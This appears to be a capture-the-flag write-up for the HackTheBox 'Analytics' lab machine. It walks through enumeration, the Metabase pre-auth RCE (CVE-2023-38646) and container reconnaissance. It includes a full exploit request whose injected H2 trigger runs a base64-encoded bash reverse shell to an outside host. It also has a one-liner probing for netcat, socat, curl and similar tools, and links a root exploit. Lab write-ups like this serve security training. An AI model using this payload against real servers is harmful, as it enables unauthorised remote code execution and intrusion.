Analytics

Personal Rating: Medium

Initial Enumeration

I started a full nmap scan and a vhost scan in the background.

sudo nmap -oA nmap-analytics -p- -A 10.10.11.233

ffuf -u http://10.10.11.233/ -H 'Host: FUZZ.analytical.htb' -w /usr/share/seclists/Discovery/DNS/dns-Jhaddix.txt -mc 200 -t 64

• There is a webserver on port 80 -> analytical.htb

• A login page references data.analytical.htb

According to Wappalyzer, there is Leaflet, React, Emotion, nginx, PWA, webpack, D3, HSTS, Ace and Lodash

So the webserver is based on Metabase. There is nothing in Hacktricks about it, so I will poke around for a bit by myself. The only exploit for it I could find online is CVE-2023-38646.

Metabase RCE

Following this guide, it seems promising: https://infosecwriteups.com/cve-2023-38646-metabase-pre-auth-rce-866220684396

I could identify the setup-token to be 249fa03d-fd94-4d5b-b94f-b4ebf3df681f

This might show the request required for exploitation:

https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/

Following the guide above, I got a reverse shell with this request after getting the token and encoding the shell:

POST /api/setup/validate HTTP/1.1
Host: data.analytical.htb
Content-Type: application/json
Cookie: metabase.DEVICE=ffe6f429-df53-4116-a173-9a822cdadb60
Content-Length: 818

{
    "token": "249fa03d-fd94-4d5b-b94f-b4ebf3df681f",
    "details":
    {
        "is_on_demand": false,
        "is_full_sync": false,
        "is_sample": false,
        "cache_ttl": null,
        "refingerprint": false,
        "auto_run_queries": true,
        "schedules":
        {},
        "details":
        {
            "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEwLjEwLjE2LjQvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}')\n$$--=x",
            "advanced-options": false,
            "ssl": true
        },
        "name": "an-sec-research-team",
        "engine": "h2"
    }
}

Internal Enum & Persistence

In the reverse shell, most commands show “command not found”

I found a database file at /metabase.db/metabase.db.mv.db , which turns out to be a H2 database, according to this https://www.metabase.com/docs/latest/installation-and-operation/configuring-application-database

LinEnum gave me this:

This did allow for ssh login

It looks like we are inside an alpine docker container!

which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null

We have some binaries, but really not many:

/usr/bin/nc
/usr/bin/wget
/usr/bin/curl
/bin/ping
/bin/base64

Running LinPEAS:

is modprobe present ............ lrwxrwxrwx 1 root root 12 Jun 14 15:03 /sbin/modprobe -> /bin/busybox

Privesc

After running LinPeas and googling for a while, I found this post https://www.reddit.com/r/selfhosted/comments/15ecpck/ubuntu_local_privilege_escalation_cve20232640/

After some more googling I found this PoC, which worked to get a root shell: https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629/blob/main/exploit.sh